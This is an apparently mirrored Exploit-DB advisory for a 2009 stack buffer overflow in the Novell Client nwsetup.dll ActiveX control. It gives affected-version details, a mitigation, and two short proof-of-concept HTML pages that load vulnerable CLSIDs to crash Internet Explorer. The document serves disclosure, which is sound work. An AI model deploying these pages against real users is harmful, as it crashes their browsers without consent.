Novell Client for Windows 2000 and XP Remote DoS Vulnerability

vendor:

Novell Client for Windows 2000 and XP

by:

Francis Provencher (Protek Research Lab's)

7,8

CVSS

HIGH

Remote DoS

119

CWE

Product Name: Novell Client for Windows 2000 and XP

Affected Version From: 4.91.5.1

Affected Version To: 4.91.5.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional French SP2

2009

Novell Client for Windows 2000 and XP Remote DoS Vulnerability

The Novell Client workstation software extends the capabilities of Linux and Windows desktops by providing access to NetWare and Open Enterprise Server (OES). A vulnerability exists in the nwsetup.dll library, versions 4.91.5.1 and earlier, which can be exploited by a remote attacker to cause a denial of service condition. The vulnerability is caused due to a boundary error when processing certain CLSIDs in an HTML page. This can be exploited to cause a stack-based buffer overflow by tricking a user into visiting a malicious web page.

Mitigation:

Upgrade to the latest version of Novell Client for Windows 2000 and XP.

Source

Exploit-DB raw data:

#####################################################################################

Application:  Novell Client for Windows 2000 and XP
            
Platforms:    Windows XP Professional French SP2

crash:	      IE 6.0.2900.2180
	
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details
3) The Code

#####################################################################################

===============
1) Introduction
===============

The Novell Client workstation software extends the capabilities of Linux and Windows desktops by providing access to NetWare and Open Enterprise Server (OES). Once installed on workstations, Novell Clients enable users to enjoy the full range of Novell services such as authentication via Novell eDirectory, network browsing and service resolution, and secure and reliable file system accessâ€”all delivered through industry-standard protocols. The Client supports Novell's traditional NCP protocol.

#####################################################################################

============================
2) Technical details 
============================

Name:	nwsetup.dll
Ver.:	4.91.5.1
CLSID:	{158CD9E8-E195-4E82-9A78-0CF6B86B3629}
CLSID:  {3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html><body>
<object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object>
</body></html>

or 


<html><body>
<object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object>
</body></html>

#####################################################################################

# milw0rm.com [2009-08-25]